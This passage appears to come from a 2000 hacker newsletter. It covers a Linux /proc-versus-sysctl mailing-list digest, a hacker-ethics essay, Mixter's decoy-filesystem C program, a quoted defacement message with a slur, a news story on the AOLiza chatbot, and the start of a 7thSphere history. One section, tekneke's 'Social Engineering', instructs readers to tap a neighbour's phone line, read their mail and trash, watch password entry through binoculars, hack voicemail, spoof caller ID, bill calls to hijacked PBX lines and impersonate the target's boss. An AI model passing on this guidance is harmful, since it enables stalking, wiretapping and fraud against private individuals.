           This seemed, by them, to be an easy solution to possible problems. Unfortunately, for Engineering, this means that we have to keep everything "current" during development so that, by the time equipment is shipped, it will run with the "current" distribution
           (whatever this is). 
      
           The obvious solution, given these constraints, is that we just ignore all changes until shipping time, then attempt to compile with the latest distribution, fixing all the problems at once. However, we then end up shipping untested software which ends up being
           another problem. Checking to see if it "runs" isn't testing software in the cold cruel world of industry. 
      
           So, presently, I have 13 drivers I have to keep "current". Yesterday they all got broken again. A week before, half of them were broken because somebody didn't like a variable name! 
      
           That said, a major problem with changes that I see, is that the changes are made without the notion of a terminating condition. For instance, new parameters are being passed to existing interface functions. 
      
           If you are going to break an interface, you should plan on only breaking it once rather than opening the door for more changes and leaving it open. For instance, once you have to pass more than (depends upon the machine) about 3 parameters, it's best to put
           them all in a parameter- list (structure) and pass only the address of the parameter list (pointer). 
      
           From that time on, you only have to add structure members to the parameter list if you have to add changes. If I had seen these kinds of changes I would not have complained. It means I have to rework stuff only once. 
      
           So `read(f,.......)` should have been changed to `read(params *)` and you are done with it forever as long as you don't change structure member names and functions for kicks. 
      
      This time it was Alexander's turn to pick himself up off the floor; and in response to the first paragraph of Richard's post, said, "Oh. My. God. They are requiring you to do WHAT??? Do you mean that you really ship 2.3.x to your customers? Arrggh. "Source" ==
      "source of what we are shipping". And not "anything that was written by other guys who started from the same source". It's utter nonsense. _No_ license can oblige you to include the modifications done by somebody else. Otherwise you'ld have those drivers in the
      main tree, BTW - _that_ much should be clear even for your LD." But David Lang put in, "he is not saying that he has to ship a 2.3 kernel, he is reacting to the fact that he will have to ship a 2.4 kernel. the blame for this lies squarly on the legal department who
      decided that they had to ship a "current" disto. There is some semblance of reason for this as they want to try and limit the support costs by not using "obsolete" versions, but given the way many of the major distros patch the kernel before shipping it you still may have
      problems. The answer is to figure out some way to educate the legal department to allow for a more gradual change." 
      
      
      #fundamental
      
      Taken from http://kt.linuxcare.com/latest.epl on 2/3/2000, this is just one example of serious design problems with Linux, and serious questions about its present and future direction, considering the plans laid out by its creator. Apparently speed and efficiency aren't as
      important to Linus as having a pretty filesystemish interface. Hope you didn't want to do anything useful with your CPU in userspace... 
      
      /proc And sysctl()
      
      2000/01/06 - 2000/01/12 (43 posts): /proc guidelines and sysctl 
      
      Benjamin Reed wrote a wireless ethernet driver that used /proc as its interface. But he was a little uncomfortable defining his own namespace under /proc, and asked if there were any conventions he should follow. He added, "And finally, what's up with sysctl? Are
      driver writers recommended to use that over extending /proc or is it deprecated? Again guide lines would be nice." 
      
      Linus replied with: 
      
           The thing to do is to create a 
      
                /proc/drivers/<drivername>/ 
      
           directory. The /proc/drivers/ directory is already there, so you'd basically do something like 
      
                create_proc_info_entry("driver/mydriver/status", 0, NULL, mydriver_status_read); 
      
           to create a "status" file (etc etc). 
      
      For the sysctl question, he added, "sysctl is deprecated. It's useful in one way only: it has some nice functions that can be used to add a block of /proc names. However, it has other downsides (allocating silly numbers etc - there should be no need for that, considering
      that the /proc namespace is alreayd a perfectly good namespace)." 
      
      Marcin Dalecki flamed Linus: 
      
           Are you just blind to the neverending format/compatiblity/parsing/performance problems the whole idea behing /proc induces inherently? Oh yes they don't turn up that frequently anylonger, since everybody learned in the time between don't touching anything
           there like a heap of shit. Instead of changing something, one leaves the broken /proc interface where it is and adds just another new file (or even dir) there. 
      
           My favorite examples for how broken they are 
      
                 /proc/stat 
                            the information there is entierly *broken* misleading and incomplete. (leftover from early days.)
                 /proc/pci 
                            static data continuously reconstructed on the fly. (binary to string and then back string to binray in userland...) And now (2.3.xx) it's event binary only...
                 /proc/cpuinfo 
                            same here static data. uname is since the beginnging the proper interface for this stuff.
                 /proc/ksyms 
                            entierly redundant and not used by the modutils.
                 /proc/modules 
                            entierly redundant to the module syscalls. *Not* used by lsmod.
                 /proc/version 
                            entierly static data with no apparent value
                 /proc/kmsg 
                            entierly redundant to syslog.
      
      
           One could continue with no end... 
      
                root:/proc# cat meminfo
                total: used: free: shared: buffers: cached:
                Mem: 64577536 62787584 1789952 20643840 1339392 17186816
                Swap: 139821056 36478976 103342080
                MemTotal: 63064 kB
                MemFree: 1748 kB
                MemShared: 20160 kB
                Buffers: 1308 kB
                Cached: 16784 kB
                SwapTotal: 136544 kB
                SwapFree: 100920 kB 
      
           Wonderfull!!!! The same data twice, albeit no one of them easly parsed! Easly parsed? By what? AWK? SED? or should the procps utilities beeing implemented in damn PERL? (Some loosers who don't know C would apreciate this, certainly) !!!!! The only
           thing I'm missing is adding floating point formats to this... 
      
           And then there is the phenomenon of proliferation of /proc items. Just an example... 
      
                root:/proc/ide# find /proc/ide
                /proc/ide
                /proc/ide/drivers
                /proc/ide/hdd
                /proc/ide/ide1
                /proc/ide/ide1/hdd
                /proc/ide/ide1/hdd/capacity
                /proc/ide/ide1/hdd/settings
                /proc/ide/ide1/hdd/model
                /proc/ide/ide1/hdd/media
                /proc/ide/ide1/hdd/identify
                /proc/ide/ide1/hdd/driver
                /proc/ide/ide1/model
                /proc/ide/ide1/mate
                /proc/ide/ide1/config
                /proc/ide/ide1/channel
                /proc/ide/hda
                /proc/ide/ide0
                /proc/ide/ide0/hda
                /proc/ide/ide0/hda/smart_thresholds
                /proc/ide/ide0/hda/smart_values
                /proc/ide/ide0/hda/geometry
                /proc/ide/ide0/hda/cache
                /proc/ide/ide0/hda/capacity
                /proc/ide/ide0/hda/settings
                /proc/ide/ide0/hda/model
                /proc/ide/ide0/hda/media
                /proc/ide/ide0/hda/identify
                /proc/ide/ide0/hda/driver
                /proc/ide/ide0/model
                /proc/ide/ide0/mate
                /proc/ide/ide0/config
                /proc/ide/ide0/channel 
      
           Hell only God know's what they are good for! And there is no userland tool for this. This is the last thing Mark Lord added before ditching ide developement. 
      
                root:/proc/sys# find /proc/sys | wc
                208 208 7305 
      
           Don't tell me any sane admit will fiddle with ALL this... And in esp. any sane system doesn't need this degree of pseudo configuration flexibility. 
      
           And here my ABSOLUTE FAVORITE: 
      
                  PID USER     PRI  NI  SIZE  RSS SHARE STAT  LIB %CPU %MEM   TIME COMMAND
                21821 root      19   0  1032 1032   816 R       0  4.7  1.6   0:00 top
                                                                    *
                                                                   ***
                                                                  *****
                                                                 *******
                                                                *********
                                                                   ***
                                                                   ***
                                                                   ***
                                                                   ***
                                                                   ***
                                                                   ***
      
           Yes reading files, walking dirtrees and parsig them is indeed very very time consuming. I would like to know how well this design will scale to an enterprise server with 32 CPU and X*10000 concurrent processes: 
      
                user:~/mysweethome: Message from root@localhost to user@localhost resived... BLAH BLAH: "Please stop any intensive intermittient computational activity. Due to maintainance work I'm going to run ps auxw int 5 minutes. Thank's in advance
                for your understanding! 
      
                You's sincerly: 
      
                root@localhost" 
      
           Oh don't tell me procps could have been done better, there where years of time for this and apparently nobody managed to get it right for practical reaons.. 
      
           I think you don't write enough user-land code... (just a guess) go and just compare for example the ps/netstat utlities from *BSD just too see WHY /proc as it is, is a BAD design :-). 
      
           Maybe it appears cute as an idea to have something like this, but in practice something like this is inevitable going to result in a coding mess in esp. in an such uncoordinated effort like Linux. 
      
           And I didn't even tell a word about the bloat/mess/races inside the kernel code caused by this all... 
      
           Really man sysctl *is* much much saner and what should be "depricated" is /proc 
      
      There was a bit of discussion, but Linus did not reply. 
      
      Alexander Viro replied to Linus' statement that sysctl was deprecated. He burst out with: 
      
           Oh, please! All we need is sysctlbyname(2) - _not_ a problem, and closes all problems with numbers. And it should not work through mounted procfs - we can traverse the tree doing comparisons by name just fine. The fact that sysctl(8) needs mounted procfs
           is an artificial misfeature, nothing more. 
      
           What _is_ bogus is the idea of sysctl() doing more than read/write access to constant-sized variables. Or procfs entries doing ioctl(), for that matter - just look at /proc/mtrr, for one specimen. 
      
           sysctl() is a perfectly reasonable subset of pseudofs-type stuff, with well-defined semantics (unlike the rest ;-/). The rest is pretty much a maze of twisted little formats, none alike. IMO dissolving the thing is _not_ a good idea. You have the final word, indeed,
           but I think that sysctlbyname() may remove most of the problems. 
      
      Linus replied that he'd accept a patch to turn sysctl into a proc-only thing. He added, "The current problem is that sysclt tries to be more than proc, and has its own name-space etc. Not worth it." Andi Kleen proposed, "The nice thing of giving up the sysctl numbers is
      that it would be possible to use some ELF section based scheme for declaring sysctl variables in nice wrapper macros. You could get a sysctl variable with a single declaration. This would make them a lot more easy. Would you accept a patch for that?" Linus replied,
      "Show me the patch, and I can consider it. It would certainly be nicer than what it is now (the include/linux/sysctl.h file is EVIL, and a perfect example of the kind of idiotic brokenness we used to have in /proc before it was cleaned up)." 
      
      Theodore Y. Ts'o also replied to Alexander, saying, "I actually like the original sysctl() design --- including the use of reserved numbers. After all, we have system calls, and we don't try to look up system calls when we executed them by name..... why is this OK for
      system calls, but not OK for sysctl()?" Linus replied: 
      
           Because system calls are performance-sensitive. 
      
           And system calls are not clearly "hierarchical". 
      
           And system calls are supposed to be there regardless of what software and hardware configuration we have there. 
      
           In contrast, sysctl isn't all that performance-sensitive, AND they are extremely hierarchical, AND they depend on configuration and timing. 
      
           In short, sysctl NEEDS: 
      
                "naming": you cannot name the sysctl space with a number: it is much too dynamic for that. How do you enumerate drivers? Give them random numbers? 
                "listing": showing which sysctl's are there, in a hierarchical manner. Again, a listing is useless with a number. 
                "hierarchy". You have different devices, but they have the same controls. Do they get the same name? Yes. But in different places in the hierarchy. 
      
           In short, you NEED a filesystem. You need to be able to "ls" the thing. You need to be able to search the thing. You need to be doing all the things you can do with a real filesystem. 
      
           And flattening it out and trying to number it does not work. Never has, never will. It's not an enumerated space. 
                                                                                                                                                                         
      Sun Jul 30 04:40:22 EDT 2000                                                   
                                                                                                                                                                                            linux/stupidity.src 
      Updated: Fri Jul 21 2000 1:13.15 
      Copyright  1998-1999 by Nick Johnson. All rights reserved. 
      
      
      
      @HWA      
      
313.0 [IND] Article submission on 'Social Engineering' by tekneke
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      Social Engineering by Tekneke

      Introduction:       The purpose of this text is to introduce or better 
      explain the art of social engineering. This is one of the most difficult 
      things to explain  but I found a rather easy method of doing it until you 
      perfect your skills.

      Cross Analyzation:        To begin social engineering you must know how to 
      cross-analyze someone. Cross Analyzation is basically determining 
      someone's personality by looking at them. This can be farely easy because 
      people make the way they live so obvious to others. For example, how would 
      you determine someone as being a homeless drunk? Well by their clothes, 
      hygeine, smell, a bottle of alcohol in their hand, etc. Another way cross 
      analyzation can be used is over the phone but this method is not reliable 
      in some cases. But it is a very useful tool when social engineering. Look 
      for things such as their tone of voice, the way they answer the phone, 
      mumbling, stuttering, etc. You can also see how dumb someone is if you 
      tell them that they won a sweepstakes and you want to collect some 
      information about them and they dont hang up on you.

      Information Gathering:        Information Gathering these days is very 
      easy for example if you wanted to find out the phone # your next door 
      neighbor simply log onto the internet and goto portal.cyberarmy.com and 
      you just type in what you know whether it be the phone number, address, or 
      full name. Another method would be by snooping through their mail and 
      trash. The best method (in my opinion) is to run a tap on their line. This 
      way you can use what you heard to make a better cross-analyzation and you 
      might gain some valuable information such as usernames and passwords, 
      (which could doubtfully be obtained by social engineering or you wouldnt 
      be reading this)and maybe you'll even be able to get some dirt on them. 
      Another method would be to get the old binoculars and watch as they enter 
      passwords for e-mail on their computer or as they chat with people. 
      Another method I have used in the passed is hacking their voice mail box 
      or answering machine. Now if you do all of this you will have a shit load 
      of information on them. Now to get to the engineering.

      Getting Prepared:        Before calling your victim you might want to get 
      a caller id spoofer or go box someone else's line. Another useful tool is 
      a voice changer. Now if you do use a voice changer make it sound like you 
      are a woman because most men will listen and believe what women tell them 
      more then men. You might also want to see what kind of counter measures 
      they have by snooping around the building or office that is your target. 
      If its just someone's house then you can assume that they have caller id 
      and some have anonymous call rejection. You might also want to route your 
      call through a pbx if you have access to one. That way if you call out of 
      area its billed on them. Another tip would be to call your target up to 
      see what you have to say or do to get the information you want from a 
      person. for example, if you were trying to get an operator to tell you the 
      number you are dialing from you might want to immatate a telco guy and say 
      you are calling from a trunk (which might work). You might also wanna find 
      out about that person's boss so that you could immatate him/her. This is a 
      very good idea if you can immatate their of voice and their slang. And if 
      they give you some shit just give them shit back and say you're gonna fire 
      them!!!

      Social Engineering:        Now its time to put all that effort to work. 
      This should actually be the easiest part if you successfully completed the 
      other stuff. But if not you are gonna have to do some serious 
      bullshitting. You might wanna reherse what you are gonna say as best as 
      you can but you must expect the unexpected. If the target is on a PBX then 
      hack into an account (such as the bosses) and call them from that. Or you 
      could box the bosses house if you know where he/she lives.

      This is only the first version of this text. I will be       releasing 
      more tips and tricks of the trade. This maybe a short text but it is a lot 
      more informative than the other ones out there. Anything to add or change? 
      Send it to tekneke@geeks404.com.

      

      __________________________________________________       Do You Yahoo!? 
      Get Yahoo! Mail - Free email you can access from anywhere! 
      http://mail.yahoo.com/

 314.0 [IBT] Ethics & The Underground, What the hell happened? - Gh0zt
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       By: Gh0zT 

       When I first came onto the scene in '95, I found the underground scene to be
       quite hospitable.  People I met were friendly, and if you said something out of
       place it was merely looked down upon.  Today things have made a drastic
       change for the worst; the scene has become a war zone if you will.  There are
       crackers, script kiddies, hackers, warez pups, groupies (a.k.a. scene whores)
       and just plain old idiots that I dont like to stereotype, but unfortunately that is
       the way it is.  Never have I seen such chaos in the scene, the long held
       traditions of ethics and netiquette have basically been forgotten or were never
       learned by the newer generation. 
 
       Many people have tried to explain why this has happened, but personally I
       think the blame falls on veteran hackers that have not lent a hand to up and
       coming newbies when they asked for help.  So, over time the newbies
       became script kiddies by learning to hack the easiest way they could--by
       simply running a script or program that someone else wrote.  And over time,
       after being rejected by legitimate hackers they developed a serious attitude. 
       The second part of the blame also falls on the media.  They have brought a
       sub-culture that was meant to be just that, a sub-culture, to the mainstream,
       and to the attention of the public. 
 
       Our ranks have swollen since high profile hacks started reaching the 10
       o'clock news and movies started having technical themes.  One movie I think
       we all can remember is "Hackers."  Even though the story line was totally
       false, it made thousands of eager kids join the scene with handles such as
       "Zero Cool" and "Lord Nikon."  Another very apparent reason for the swell in
       our ranks has been because of media interviews.  Alot of big name hackers
       who have gone commercial and now call themselves White Hat Hackers; in
       other words a hacker for hire.  I have nothing against these people because
       they are doing what they love and getting paid a lot of money for it.  However,
       sometimes they seem to forget that each of us at one time was a neophyte
       and NONE of us were born with a nix manual.  Sometimes they need to stop
       for a second and actually befriend someone who is having trouble. 
 
       That, in my humble opinion, is a part of the reason for the decline in ethics. 
       The other is a lack of role models.  Yes, some hackers such as the world
       renowned Cult of the Dead Cow have remained in touch with their peers but
       other groups have not and don't want anything to do with newbies.  The motto
       of these people is "Read the Fucking Manual."  I have news for all of those
       types of people:  the person you just blew off might have had experience in
       another area such as programming, or some other kind of knowledge that you
       yourself are lacking, but they just need that little boost to help them out a bit. 
       The worst part is you will never know and you might have hampered your own
       growth by blowing them off.
 
       Almost everyday I hear about web site defacements, the media describing
       ALL hackers as criminal, comparing us to common thugs, although this is not
       true.  One thing we all have to remember about people is this:  if they don't
       understand a culture they will be biased against it, that is true.  It is kind of
       the same when the general public thinks of a hacker as a nerdy white guy
       who is pale as paper and sits in a room all night trying to get their credit card
       numbers.
 
       No one thinks that anybody on the street could be a hacker.  I can remember
       once I had not gotten a hair cut nor had I shaved for four months.  This was
       due to a lack of time and laziness.  One day I met someone at work who was
       asking a question about computers.  I responded with the answer he needed
       and he looked at me strangely, as if he had seen a ghost.  It was
       incomprehensible to him that I posessed computer knowledge, and when I
       asked him, "Why the strange look?", he responded that he didnt think I even
       had a computer, much less how to turn one on.  There has been so much
       stereotyping that normal people just dont think that the person working next
       to them or even the garbage man could be a hacker, or even involved in the
       computer underground. The truth of the matter is, although a large majority is
       white, there are plenty of minorities actively involved in the scene. 
 
       If youre like me, then you are sick of hearing about kids nuking some
       sixty-year-old grandmother offline because
 
       she simply stated a religious viewpoint, or waking up and hearing about some
       15 year old "hacker" because he cracked his school network and changed his
       grades  Now is the time to start setting examples for both neophytes and
       script kiddies alike, because they are our future and without ethics the scene
       will become what the media is making it out to be. 
 
       Generally I always try to help people when I can.  If someone asks a question
       just try to have patience and help them out, even if it is a "how do I hack my
       girlfriend's hotmail account" type of question.  Do not simply tell them to go
       fuck themselves, just give them an appropriate answer and/or suggest a better
       course of action.  One major thing that is getting a lot of people in trouble is
       the fact that some of us do not know when to stop bragging and when to shut
       up.  If you didnt know, that is one of the biggest ways people in the scene get
       busted, by agents posing as fellow scene members.  When you are on a chat
       service, remember to treat people like you want to be treated, because it
       leaves a lasting impression on people.  So just think next time you go into a
       chat room.  Someone who you might meet later in life could be there, and you
       might turn him or her off to helping newbies.  If you see someone such as a
       "groupie" (a.k.a. scene whore), make sure you turn a kind cheek and
       remember not to get down with them, because it could lead to your downfall. 
       Scene whores make other women look bad, because if a female is
       legitimately trying to get in to the computer security scene, then they make it
       harder because their male counterparts dont respect them as much as other
       males. So, in other words, just treat females equally even if they are whores. 
 
       Those are my opinions, and they are just that, opinions.  I also hope that I
       made people think and form their own opinions.  That was what I was aiming
       for, but in truth I have to say, "Wake Up."  We are getting more and more
       restrictions slapped on us and we are just taking it.  There needs to be a
       unified underground to help each other out when we need it.  But like I said,
       this is only my opinion.
 
       I also must commend Carole Fennelly on her response to an article that was
      published on HNN about scene whores. 

      @HWA       

 315.0 [IND] PCFS.C by Mixter
       ~~~~~~~~~~~~~~~~~~~~~~
       
       This is totally cool, check it out, another gem from Mixter. - Ed
       
       home:http://mixter.void.ru
       email:mixter@newyorkoffice.com
       
       
       
      /*
       *            pcfs - pseudo cryptographic file system
       *                      (c) 2000 by Mixter
       *
       *  This tool just creates a recursive directory and file structure
       *  that contains purely random data, but is indistinguishable from a
       *  encrypted CFS directory, unless an extensive cryptanalysis is performed.
       *  This can be taken as a proof that a strange directory cannot easily be
       *  proven to actually contain encrypted data. May be useful against f3dz,
       *  just for decoy purposes, or to keep people from analyzing your
       *  cryptographic file systems structure. Distributed according to the GPL.
       *
       *  WARNING: THIS PROGRAM IS SUBJECT TO PSEUDO-CRYPTOGRAPHIC EXPORT
       *  CONTROLS AND US-RESTRICTIONS AGAINST RANDOM DATA! =P
       *  This code was reviewed and approved by the SCC (sloppy code commission)
       *  gcc -Wall -O2 pcfs.c -o pcfs
       */
      
      #include <stdio.h>
      #include <string.h>
      #include <sys/time.h>
      #include <sys/resource.h>
      #include <sys/types.h>
      #include <sys/stat.h>
      #include <fcntl.h>
      #include <unistd.h>
      #include <stdlib.h>
      
      #define START_PATH      "fake"
      
      mode_t modes[7] =
      {00755, 00644, 0000, 00664, 00700, 00777, 00444};
      char chr[16] = "abcdef1234567890", rseed[65535], buffer[256];
      char wd[200];
      int rcounter = 0;
      void random_init (void);
      inline long gr (int, int);
      char *rname (void);
      mode_t rmode (void);
      void mkfiles (void);
      void mkd (char *, int);
      
      int
      main (void)
      {
        printf ("Creating fake file system in %s/%s, press a key\n",
                getcwd (wd, 200), START_PATH);
        (void) getchar ();
        printf ("Hit CTRL+C to stop - creating files");
        if (!geteuid ())
          setpriority (PRIO_PROCESS, 0, -10);
        mkd (START_PATH, 0);
        return 0;
      }
      
      void
      mkd (char *dirname, int forking)
      {
        printf (".");
        fflush (stdout);
      
        if (forking)
          if (fork ())
            return;
        mkdir (dirname, rmode ());
        getcwd (wd, 200);
        strcat (wd, "/");
        strcat (wd, dirname);
        chdir (wd);
        if (forking)
          mkfiles ();
        else
          {
            char smbuf[32];
            int a, f = open ("/dev/urandom", O_RDONLY);
            read (f, smbuf, 32);
            a = open ("...", O_WRONLY | O_CREAT | O_TRUNC, 00644);    /* hash */
            write (a, smbuf, gr (5, 10));
            close (a);
            sprintf (smbuf, "%ld", gr (1, 5));
            a = open ("..c", O_WRONLY | O_CREAT | O_TRUNC, 00644);    /* algorithm */
            write (a, smbuf, strlen(smbuf));
            close (a);
            read (f, smbuf, 32);
            a = open ("..k", O_WRONLY | O_CREAT | O_TRUNC, 00644);    /* encrypted key */
            write (a, smbuf, 32);
            close (a);
            close (f);
            sprintf (smbuf, "%ld", gr (1000, 900000));
            a = open ("..s", O_WRONLY | O_CREAT | O_TRUNC, 00644);    /* session blah */
            write (a, smbuf, strlen(smbuf));
            close (a);
            while (1)
              mkfiles ();
          }
      }
      
      void
      mkfiles (void)
      {
        while (gr (0, 25))
          if (!gr (0, 10))
            mkd (rname (), 1);
          else
            {
              int f = open ("/dev/urandom", O_RDONLY), x, y = gr (0, 65500);
              char fname[256], fn2[256], big[65535];
              memset (fname, 0, 256);
              memset (fn2, 0, 256);
              sprintf (fname, "%s", rname ());
              sprintf (fn2, ".pvect_%s", rname ());
              symlink (fname, fn2);
              x = open (fname, O_RDWR | O_CREAT, rmode());
              read (f, big, y);
              write (x, big, y);
              close (f);
              close (x);
            }
      }
      
      char *
      rname (void)
      {
        int i;
        memset (buffer, 0, 256);
        for (i = 0; i < gr (5, 150); i++)
          buffer[i] = chr[gr (0, 15)];
        return buffer;
      }
      
      mode_t
      rmode (void)
      {
        return (modes[gr (0, 6)]);
      }
      
      void
      random_init (void)
      {
        int rfd = open ("/dev/urandom", O_RDONLY);
        if (rfd < 0)
          rfd = open ("/dev/random", O_RDONLY);
        rcounter = read (rfd, rseed, 65535);
        close (rfd);
      }
      
      inline
      long
      gr (int min, int max)
      {
        if (rcounter < 2)
          random_init ();
        srand (rseed[rcounter] + (rseed[rcounter - 1] << 8));
        rcounter -= 2;
        return ((random () % (int) (((max) + 1) - (min))) + (min));
      }
      
      @HWA       

 316.0 [IND] The hypocracy runs rampant prizm mr anti-defacement himself defaces?
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


        When I knew prizm he was VERY anti-web defacement, and anti-script kiddy, i'm 
        not sure if this was really done by him but it does fit his attitude and way of
        speaking...also b0f security has not existed for months now not to mention he quit
        several times and was VERY quit last we spoke...

        Aug 10th 2000

        link:Attrition http://www.attrition.org/mirror/attrition/2000/08/10/www.mothermadetoys.com/

                                      
          /title/ sure, you can do it  //title/
          
          hacked by prizm of b0f security.

        I hacked this server to say that attrition.org are a bunch of
        hypocrit faggots for hosting their defacement archieve, yet they dont
        condone defacements.
        
           They say that script kiddies are stupid for running around  
        defacing all these random servers, yet, they host a defacement archive   
        that 90% of media organizations visit to keep tabs on hacks. What it seems
        like to me is that the attrition crew are nothing but a bunch of lame
        media whores that want to get their 15 minutes of fame in this huge media 
        surge from the media about hackers and hacking.
        
             Also, doesn't it seem kinda odd that some of the attrition crew
        are "security consultants" and host a defacement mirror?  What a better  
        way to cash in huh?  Host a defacement mirror, send e-mails out to the
        hacked machines and offer your services.  They say they dont, but they
        also said they werent HFG, but everyone knows they were. They ever missed
        a HFG hack did they? Nope.
        
        
        Attrition.org is nothing more than antionline.com with a
        defacement mirror. It's all about the media.  All those RDS kiddies
        running around rds'ing their way into any and everything they can find and
        hosting their hacks are a great way to get that media to come isn't
        it?  A great way to get work.
        
        
        I'm gonna send this to attrition.org to see if they will
        mirror something that talks shit about them.  The problably will edit this
        defacement like they do most of the others.  I guess we'll see. 
        
        
                                                                                          
        Additional: remnant members of b0f (some not all) including Slash the founder merged with 
        HWA Security, hence the news worthiness of this item.
                                   
       @HWA 
       
 317.0 [MM] Do you have an imaginary friend? no? are you sure?? 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       By TrdOnjuan
              
       http://www.abcnews.go.com/sections/tech/DailyNews/aoliza000829.html       
       
       Imaginary Friends
                                      Electronic Chatter Fools Instant
                                      Messengers 

                                      Some Instant Messengers have found
                                      Eliza, a 33-year-old in Berkeley, Calif.
                                      They think she's a relative, or they tell
                                      her painful stories about ex-girlfriends.
                                      But actually Eliza's a computer program.
                                      (aol.com)
                                                                  


                 By Sascha Segan

                 Aug. 29   Do you really know the person with
                 whom youre chatting online? Do you really
                 know it is, in fact, a person?
                      AOL Instant Messenger, a one-on-one online chat
                 system, is a sea of conversations and failed attempts at
                 contact, where millions of people each day reach out to
                 talk to people they know   or people they hope to
                 know.
                      Some find Eliza, a 33-year-old in Berkeley, Calif.
                 They think shes a relative, or they tell her painful stories
                 about ex-girlfriends. 
                      The problem is, Elizas a computer program   one of
                 the simplest artificial intelligence programs around, and a
                 lot of the people talking to Berkeley student Kevin Foxs
                 unattended Powerbook G3 dont seem to notice (or
                 maybe care.)
                      They just want to connect with someone.
                       Their minds are set to try and make sense of anything
                  to try to interpret anything as communication,  Fox
                 said.
                      AOL isnt pleased that naive users are mistaking Eliza
                 for one of their own.
                      AIM is  diverse, its hip and its fun, which arent the
                 words Id use to describe a robot,  said AOL spokesman
                 Nicholas Graham.  [Users] expect a real, live person to
                 be behind the screen name.  

                 Enter AOLiza
                 Fox has chronicled 31 human-Eliza interactions on his
                 Web page, AOLiza, and hes adding more regularly. A
                 few of the correspondents seem to have figured out
                 theyre talking to a program, but AOLiza has had
                 extended, nonsensical conversations with people looking
                 for information on lobster diving, offering porn or thinking
                 its a relative of theirs.
                      The truly weird thing is that Eliza is a very, very basic
                 program, yet people keep chatting with it. Other than
                 conversation prompters like  I see  and  does talking
                 about this bother you,  the original 1966 Eliza mostly only
                 parrots back comments, producing phrases like  why do
                 you tell me you were huh me nuts you gave her all the
                 room she wanted never told nhewre what to do or where
                 to go now? 
                      The fragmented, semi-incoherent style of speech and
                 Elizas refusal to say goodbye suck in Instant Messaging
                 conversationalists more than people in group chat rooms
                 or e-mail, Fox said.
                       The medium of IM is so new, and so coarse in
                 general. Youre not talking in real sentences, like you are
                 in e-mail,  he said. And since IM conversations habitually
                 end with a  goodbye,  Elizas habit of continually asking
                 more questions can keep people chatting for hours, he
                 said.
                      People will talk to anything   whether or not it talks
                 back, said Steve Jones, head of the communications
                 department at the University of Illinois at Chicago and a
                 researcher into Internet communication.
                       We talk to ourselves. We talk to our pets. We
                 anthropomorphize anything,  he said.
                      Fox hasnt told any of his correspondents, whose
                 identities he keeps secret, that they were talking to a
                 machine. He doesnt want to embarrass them in front of
                 others or spoil the fun.
                       Nobodys getting hurt unless theyre letting
                 themselves get hurt. You cant identify them at all,  he
                 said.
                      Graham said AOL hasnt received any complaints, but
                 that they may take action against AOLiza if they do. 

                 Battle of the Bots
                 This isnt the first time machines have elbowed their way
                 into Net chat, though it may be a first for AIM. Plenty of
                  bots  are resident on IRC, the Internet Relay Chat
                 network where more technically-savvy chatters hang out.
                 They serve as virtual bartenders, terrorists, even a game
                 show host running a perpetual Jeopardy game.
                      But most IRC bots announce themselves as such, and
                 people are on the lookout for automata there, Fox said.
                 Instant Messengers, often new Net users who got the
                 program with their AOL accounts, may be a bit more
                 nave, he said.
                      Mark Humphrys, a lecturer at Dublin City University in
                 Ireland, ran a similar experiment on a chat network in
                 1989. His program,  MGonz,  used a lot more colloquial
                 language than AOLiza and ended up squeezing an
                 admission out of one boasting correspondent that no, he
                 actually hadnt had sex in the previous 24 hours.
                      AOLiza and MGonz arent trying to pass the Turing
                 test, the holy grail of artificial intelligence. That test,
                 devised in 1950 by computer pioneer Alan Turing, would
                 require a computer smart enough to be indistinguishable
                 from a competing human while talking on any topic. 
                      Nobodys yet won the $100,000 Loebner prize,
                 offered since 1990 by New York philanthropist Hugh
                 Loebner, for a program that passes the Turing test, though
                 competitions have been held every year.
                      Rather, AOLiza plays on peoples need to make sense
                 out of nonsense, Fox said.
                      Chatters dont want to think theres nobody out there,
                 Humphrys said   even if their interlocutor seems to
                 repeat himself a lot and sound oddly robotic.
                       The theory he formed to explain that was, do you
                 have all of these sayings on command [keys]? Obviously,
                 he couldnt make the leap to think there was nobody at
                 home whatsoever,  Humphrys said. 
                      Fox has changed AOLizas address on IM and is
                 considering updating the software. So beware   if you
                 decide to chat up a stranger on the Net, she may not be
                 who you think she is. In fact, she may not be anyone at all.

                 Talking With AOLiza 
                 This is an excerpt of one of the conversations with
                 AOLiza posted on Kevin Foxs Web site.

                 AOLiza: tell me more about that.
                 human: about what
                 AOLiza: what do you think?
                 human: therers nothing to tell she us3ed me then got
                 tired of me said i wasnt her type anymore i was
                 possesive and controlling 
                 AOLiza: perhaps i already know you were possesive and
                 controlling.
                 human: i was huh you nuts i gave her all the room she
                 wanted never told nhewre what to do or where to go
                 AOLiza: why do you tell me you were huh me nuts you
                 gave her all the room she wanted never told nhewre what
                 to do or where to go now?
                 human: what
                 AOLiza: have you asked such questions before?
                 human: about what this isnt making any sense
                 AOLiza: does that question interest you?
                 human: she didnt love me never did i was just another
                 guy
                 AOLiza: why do you tell me you were just another guy
                 now?
                 human: what do you mean i though i meant something
                 to her i though we where good together but i was duped
                 by her she played me along,what part dont you
                 understand
                 AOLiza: were you really?
                 human: i was nothing to her
                 human: yes really
                 AOLiza: i see.
                 
                 @HWA

 318.0 [HWA] What ever happened to .... 7thSphere?
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       History

       7thsphere started in 1996 when cashmere began writing an mIRC script for
       protection against floods. soon after that, i became really interested in
       scripting, so i asked if i could help. together, we produced what became 
       the most popular mIRC script ever. after 2 versions, cashmere
       went his seperate way, and venum joined me. His programming talents took 
       7thsphere to the next level. We have been featured in numerous newspaper 
       articles, and even in the book "Maximum Security" which can be found in 
       various computer stores, as well as in online stores.

       It was around this time that 7thsphere.com was born. Thanks to the 
       generous contributions of many people around the world, we were able to 
       purchase the domain name and pay for webhosting services. the domain 
       became popular very quicky. soon it was the host to numerous sites        
       relating to the 7thsphere mentality (including the warforge, which has 
       now grown to epic proportions). Such sites as Slackers Inc, the HPVAC 
       Shop, The List, and 7thsphereIRC were all developed by myself to further 
